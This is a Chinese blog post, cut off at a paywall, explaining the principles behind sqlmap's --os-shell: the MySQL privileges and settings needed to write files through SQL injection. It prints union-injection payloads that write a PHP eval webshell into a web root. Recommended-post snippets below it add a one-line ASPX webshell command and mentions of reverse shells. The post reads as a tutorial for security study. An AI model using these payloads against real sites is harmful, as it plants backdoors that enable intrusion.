php 原理 淘口令 解密_Sqlmap之osshell原理分析

最新推荐文章于 2024-05-04 20:22:56 发布
最新推荐文章于 2024-05-04 20:22:56 发布
阅读量499 收藏
点赞数
文章标签: php 原理 淘口令 解密
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30118919/article/details/112226321
版权

点击蓝字

8034d1d240748b9f2101afdffe130643.gif

关注我们

声明

本文作者:Gality

本文字数:5000

阅读时长:30min

附件/链接:点击查看原文下载

声明:请勿用作违法用途,否则后果自负

本文属于WgpSec原创奖励计划,未经许可禁止转载

前言

最近跟一些同伴分享面试经验时发现,在面那些出名的安全厂商时,面试官很喜欢问os-shell相关的原理,网上的分析杂七杂八,大多是相互抄袭,作者并没有真正去实践这些技术,也缺少对sqlmap源码和其底层原理的分析,希望能通过我的分析,让大家对sql注入写shell相关的原理有透彻的了解

一、

写入Shell的前提

在以下条件满足的情况下,我们可以直接利用sql注入的漏洞来获得一个shell,便于我们后续的攻击:

root权限,需要写文件的权限

select group_concat(user,0x3a,file_priv) from mysql.user;出现Y,这就代表你有文件权限,N就是没有

ae2e54952ce49bec09a6e03c49c4f6ca.png

  • 知道网站的绝对路径

  • 文件不能覆盖写入,所以文件必须为不存在

  • PHP的GPC关闭,能使用单双引号(需要单引号路径,不能使用0x编码)

  • –secure-file-priv没有值

show global variables like '%secure_file_priv%';

查看secure-file-priv

f8156548a36e8f78ff3ff4649659c99f.png

对于大多数sql注入的写Shell方式而言,网站的绝对的路径都是需要知道的,这里需要知道的原因绝不是因为outfile相对路径无法写shell,而是因为

  1. 不知道路径,你的菜刀无法连接

  2. 通过相对路径的方式写出来的shell大概率是无法执行的,或者是权限不够写

902d262159d3e8023437cc96e82dfd58.png

但如果扩展思路,如果配合任意文件包含的话,我们就可以尝试使用默认的mysql安装路径去包含这个文件执行

–secure-file-priv是mysql5.7+的新参数,用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()传到哪个指定目录

  • secure_file_priv 为 NULL 时,表示限制mysqld不允许导入或导出。

  • secure_file_priv 为 /tmp 时,表示限制mysqld只能在/tmp目录中执行导入导出,其他目录不能执行。

  • secure_file_priv 没有值时,表示不限制mysqld在任意目录的导入导出。

因为 secure_file_priv 参数是只读参数,不能使用set global命令修改,需要在my.cnf 或 my.ini,加入secure_file_priv=''后重启mysql

magic_quotes_gpc:

为 GPC (Get/Post/Cookie) 操作设置 magic_quotes 状态。当 magic_quotes 为 on,所有的 ' (单引号)、" (双引号)、\(反斜杠)和 NUL's 被一个反斜杠自动转义

该特性已自 PHP 5.3.0 起废弃并将自 PHP 5.4.0 起移除

二、

常规写shell方法

联合查询写shell

当可以使用联合查询时,通过构造类似:

1' union select 1,'<?php eval($_POST[a]);?>' INTO OUTFILE '/var/www/html/test.php'#

或者

1' union select 1,'<?php eval($_POST[a]);?>' INTO dumpfile '/var/www/html/test.php'#

来将shell写入到test.php中,关于outfile和dumpfile的区别,稍微说一下,官方给的解释是:

  • outfile函数可以导出多行,而dumpfile只能导出一行数据

  • outfile函数在将数据写到文件里时有特殊的格式转换,而dumpfile则保持原数据格式

fe0b983a9d2865e32138c6a83fa1163f.png

从上图中我们可以清晰的看到,

在使用outfile时,文件中一行的末尾会自动换行,且可以导出全部数据,同时如果文本中存在\n等字符,会自动转义成\\n,也就是会多加一个\

最低0.47元/天 解锁文章
毕小荷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
两款超级好用的PDF工具PDF Shaper,pdfFactory FinePrint虚拟打印机绿色单文件版
CaiHuaZeiPoJie的博客
10-22 2295
PDF Shaper 强大实用的全能PDF工具箱!这款PDF转换器包含了很多非常实用的PDF功能,可以轻松的把 PDF 转成 Word,PDF 转图像,PDF 加密等等。它还可以合并,分割,加密和解密 PDF,图像转换为 PDF,PDF 转换为 RTF 或 图像,从 PDF 中提取文本和图像,转换或裁剪已签名的PDF等。该软件原生免费仅限非商业用途,体积小巧,资源占用低,界面简单易用,支持批处理、支持Unicode文本。 PDF Shaper的功能可以说几乎覆盖了日常PDF操作的方方面面,并且它拥有无需安
go md5加密解密_PHP 代码加密实践
weixin_39952502的博客
11-21 275
在我们开发的项目中,有一部分可能是用于商业用途,会部署在客户提供的机器环境中。因为 PHP 本身是解释型语言,所以未进行处理的代码,就会有泄露或被修改的风险。那么我们可能会想到最简单有效的方法就是进行加密混淆,然后配合一系列的校验,来保护我们的代码。那么本篇文章中,我们就采用了开源的 PHP 加密扩展 screw-plus 进行相关实践分析。目前市场上有多种加密方案,但基本都是收费的。我们本次实践...
安全工具学习之SQLmap部分代码分析
最新发布
A345545108的博客
05-04 956
最近突发奇想想研究一下安全工具,所以就分析了最常见但是写的特别特别好的sqlmap,因为本人属于小白,如果文章分析内容有错误,望大佬们帮忙指正!Q'w'Q。
Python学习:执行系统shell命令
追风筝的人的专栏
08-22 3612
1.问题 python可以作为shell替代,代码比较直观,易于维护。 python支持调用外部shell命令。不过,这个问题没有看上去简单,要完美的解决此问题,比较复杂,就连标准库也不见得处理得很好。 2.方案 2.1.方案一 首先最简单的方法就是调用system方法,直接执行系统shell命令,代码如下: import os os.system('ls -l') system主要问题,就是无法获取shell命令的输出,无法进行输入;也没有超时设置,如果外部命令挂死,会直接导致当前进程挂死。 2.2
php 原理 口令 解密_实战:从弱口令到批量拿下服务器!
weixin_36178269的博客
12-30 125
来源:https://bbs.ichunqiu.com/thread-59402-1-2.html前言:又是阴风怒号的一天,去学校信息中心上完兼职后喝了杯热乎乎的咖啡,回到寝室后开启了这波批量拿下服务器的操作一:闲来无事打开电脑,熟练的用上了fofa,突然间,一个关键词引发的批量拿下服务器就这么开始了好家伙,默认账户密码都说了,那会不会有弱口令呢,结果是有。。。点登录来到phpmya...
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 3779
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木马。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell 的使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木马,连接蚁剑。上图就是一句话木马的内容。二、sqlmap跑包。
sqlmap自动扫描器.zip_sqlmap_sqlmap扫描器_sql工具
09-23
SQLMap是一款强大的、自动化SQL注入攻击工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员快速、有效地发现和利用数据库服务器的潜在漏洞。在这个"sqlmap自动扫描器.zip"压缩包中,包含...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
5. 高级功能:如需执行自定义SQL命令,可以使用`sqlmap -p parameter --sql-shell`进入交互模式。 四、防御SQL注入的策略 1. 输入验证:对用户输入进行严格的过滤和检查,避免非法字符。 2. 参数化查询:使用预...
sql注入扫描_sqlmap-1.1.3.zip
02-13
sqlmapproject-sqlmap-c1c7ea3这个文件中,包含了SQLMap项目的源代码,这为开发者提供了深入理解工具工作原理的机会,也可以根据需要对其进行定制和扩展。对于安全研究人员来说,学习和使用SQLMap不仅可以提升检测...
sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_
09-30
标题中的"sqlmapproject-sqlmap-1.4.7-26-g84bc264 (1)_sqlmap_tool_"表明我们讨论的是SQLMap的一个特定版本,即1.4.7-26-g84bc264。在本篇文章中,我们将深入探讨SQLMap的功能、工作原理以及如何使用这个强大的工具...
sqlmap_自动化sql注入引擎_None_sqlmap_sql注入_sql_flath1c_vulnerability_
10-02
SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句。它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器。攻击者可以使用SQL注入漏洞绕过应用程序安全措施;...
学习Shell编程不迷茫之一----基础了解
gf_lvah的博客
10-25 332
学习Shell的前提 什么是Shell 什么是Shell脚本 Shell程序在与运维工作中的地位 Shell的种类 Shell的优势 常用操作系统的默认Shell
学习Shell编程的前提
08-01 98
转载于:https://www.cnblogs.com/niezhongle/p/11283050.html
关于--os-shell写webshell
qq_40806924的博客
07-30 2027
1.首先需要知道目录(web目录) 2.得是DBA权限 寻找web目录 dir C:\ /s /b | find “xLogin.aspx” 这里需要注意转义^ echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx' os-shell 无法执行的时候,权限低的时候可以尝试 sql-shell写webshell select
SQLServer获取权限的奇淫技巧
谢公子的博客
07-26 1372
利用前提: 目标网站注入支持堆叠注入 当前权限是 SA 权限 无法使用 --os-shell或者是 使用 --os-shell执行命令不正常(无回显或不能执行弹shell操作) 这里很多人就会问了,既然是 SA 权限,不是可以直接利用 xp_cmdshell 执行系统命令吗?对,没错,但是你这里执行系统命令有问题,具体表现为无回显 或者 是执行弹shell操作失败(有可能是该...
SQL注入:为什么拿不到os-shell
无名J0kзr的博客
10-08 1751
文章目录权限问题--file-read--file-write和--file-dest--os-shell 权限问题 首先确保注入点的数据库连接用户有FILE权限 使用 --privileges查看 但是 就算有此权限也还有很多问题 SELINUX 因为我的服务器使用的并不是Apache的默认发布目录 所以我把SELINUX禁掉了 按理来说 SELINUX也会对这些操作有影响 没试 先留坑 –fi...
sqlmap --os-shell 原理详解
热门推荐
..
04-13 2万+
os-shell 执行原理 对于mysql数据库来说,--os-shell的本质就是写入两个php文件,其中的tmpugvzq.php可以让我们上传文件到网站路径下,如下图。 然后sqlmap就会通过上面这个php上传一个用于命令执行的tmpbylqf.php到网站路径下,让我们命令执行,并将输出的内容返回sqlmap端。 这是单看tmpbylqf.php的执行效果: 过程演示 本次实验环境是本机上搭建的sqli-libs,目的为了研究--os-shell原理,..
数据库安全——SQLMap源码简析(一)
肥叔菌的博客
10-31 1175
目录结构 对照目录结构我们来梳理一下:这里我是下载的sqlmap最新版本1.4.3.12 1.data目录包含可以搭建的图形化界面模板,shell后门(里边的代码是经过加密的),udf提权功能,数据库注入检测载荷等 2.doc目录是针对不同国家和地区的使用说明 3.extra目录有一些额外功能,运行cmd、shellcode,icmp协议的反弹shell(是的icmp是可以用来反弹shell的,在平时的渗透过程中碰到传统的tcp,udp反弹shell不成功,可以考虑使用icmp协议或者DNS协议进行反弹
sqlmap –os-shell原理
mingyqf的博客
11-06 4632
0x00 Background 最近遇到测试环境,最后利用sqlmap的--os-shell参数取得shell。一直以来,对这个参数的工作原理不是十分的清晰。大致的思想应该是将脚本插入到数据库中,然后生成相应的代码文件,获取shell即可执行命令。 0x01 Environment 本环境是在局域网下利用两台主机搭建的,环境比较真实。 攻击机: 系统:windows7 工具:sqlmap 靶机: 系统:windows7 环境:wamp搭建的ap...
sqlmap --os-shell mssql数据库原理详解
06-09
SQLMAP 是一个流行的 SQL 注入工具,可以用于检测和利用 Web 应用程序中的 SQL 注入漏洞。使用 `--os-shell` 参数可以在漏洞利用成功后获取一个交互式的操作系统shell。而 MSSQL 则是一种关系型数据库管理系统。 在 SQL 注入漏洞中,攻击者通过将恶意的 SQL 语句注入到应用程序的输入参数中,可以实现对数据库的非法访问和操作。当 SQLMAP 检测到一个漏洞后,它会尝试利用该漏洞,通过发送一系列的 SQL 命令和参数,来获取目标系统的敏感数据或执行系统命令。 使用 `--os-shell` 参数,SQLMAP 可以在漏洞利用成功后获取一个操作系统的交互式shell。这样,攻击者可以通过该shell执行任意的系统命令,并获取系统的一切权限。 MSSQL 是一种关系型数据库管理系统,由 Microsoft 公司开发和维护。它使用 T-SQL 语言来管理和操作数据库,支持多种数据类型和存储引擎。在 MSSQL 中,用户可以创建和管理数据库、表、视图、存储过程等数据库对象,并使用 SQL 语言进行数据的查询、修改和删除等操作。 总之,SQL 注入漏洞和 MSSQL 数据库是两个不同的概念,SQLMAP 是一种利用 SQL 注入漏洞的工具,可以通过 `--os-shell` 参数获取操作系统的交互式shell,而 MSSQL 是一种常见的关系型数据库管理系统,用于管理和操作数据库。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值